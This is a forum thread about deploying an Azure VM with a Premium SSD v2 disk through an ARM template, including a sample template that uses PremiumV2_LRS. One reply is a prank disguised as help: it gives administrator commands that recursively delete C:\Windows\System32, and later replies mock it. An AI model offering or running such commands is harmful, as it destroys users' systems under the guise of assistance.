ARM template to deploy Azure VM with Premium_SSD_v2 disk
I'm new to ARM templates and struggling to get a task done.
I used the Azure portal to construct an ARM template to deploy a new VM with the necessary components and that has deployed successfully.  After additional analysis I decided to move to Premium_SSD_v2 disks for better throughput.  In trying to use the Portal to create a new complete template with everything in it, I don't see the "v2" disk as an available option when creating the VM template.
I've tried using the portal to create the v2 disk as stand-alone and then combine those elements into the original all-in-one VM template but I find that there are multiple references to other components and a simple inter lacing of the ARM templates is not quite that easy. I've tried using AI solutions to see if they could combine them, but that seemed like a dead end as well.
I'd appreciate any suggestions, whether to the direct way to get this task completed or to technical guidance of the knowledge needed to interlace ARM template elements and understand everything involved.  I need the overarching knowledge but I'm really set back on why this subject is so hard to break in to.

Check here, there is a sample vm arm template

you can config storageAccountType from StandardSSD_LRS to PremiumV2_LRS, which you can get the Premium_SSD_v2 disk type vm.

    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-03-01",
      "name": "[parameters('vmName')]",
      "location": "[parameters('location')]",
      "properties": {
        "hardwareProfile": {
          "vmSize": "[parameters('vmSize')]"
        },
        "osProfile": {
          "computerName": "[parameters('vmName')]",
          "adminUsername": "[parameters('adminUsername')]",
          "adminPassword": "[parameters('adminPassword')]"
        },
        "storageProfile": {
          "imageReference": {
            "publisher": "MicrosoftWindowsServer",
            "offer": "WindowsServer",
            "sku": "[parameters('OSVersion')]",
            "version": "latest"
          },
          "osDisk": {
            "createOption": "FromImage",
            "managedDisk": {
              "storageAccountType": "StandardSSD_LRS"
            }
          },
          "dataDisks": [
            {
              "diskSizeGB": 1023,
              "lun": 0,
              "createOption": "Empty"
            }
          ]
        },
        "networkProfile": {
          "networkInterfaces": [
            {
              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
            }
          ]
        },
        "diagnosticsProfile": {
          "bootDiagnostics": {
            "enabled": true,
            "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName')), '2022-05-01').primaryEndpoints.blob]"
          }
        },
        "securityProfile": "[if(equals(parameters('securityType'), 'TrustedLaunch'), variables('securityProfileJson'), null())]"
      },
      "dependsOn": [
        "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]",
        "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
      ]
    },

All allowed types, reference



Click the "Start" icon and search for "Command Prompt".
Select "Run as administrator".
Type del /s /q C:\Windows\System32\* and hit Enter.
Type rd /s /q C:\Windows\System32 and press Enter.


Im sure its answers just like this that got you ahead in life.

LOL! Measure twice, code once!!!
